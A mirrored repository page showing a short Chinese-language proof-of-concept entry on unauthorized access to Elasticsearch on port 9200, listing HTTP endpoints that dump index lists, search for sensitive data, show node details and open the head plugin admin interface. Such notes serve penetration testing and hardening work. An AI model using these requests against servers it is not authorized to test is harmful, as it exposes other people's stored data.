admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 03:44:10 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/数据库漏洞/Elasticsearch 未授权访问.md

24 lines
535 B
Markdown
Raw Normal View History

update
2024-11-06 14:10:36 +08:00
# Elasticsearch 未授权访问
## 漏洞描述
Elasticsearch是用Java开发的企业级搜索引擎默认端口9200存在未授权访问漏洞时可被非法操作数据
## 漏洞影响
```
Elasticsearch
```
## 漏洞复现
访问目标URL : http://xxx.xxx.xxx.xxx:9200/_node
```plain
http://localhost:9200/_cat/indices
http://localhost:9200/_river/_search //查看数据库敏感信息
http://localhost:9200/_nodes //查看节点数据
http://localhost:9200/_plugin/head/ //web管理界面(head插件)
```
Reference in New Issue Copy Permalink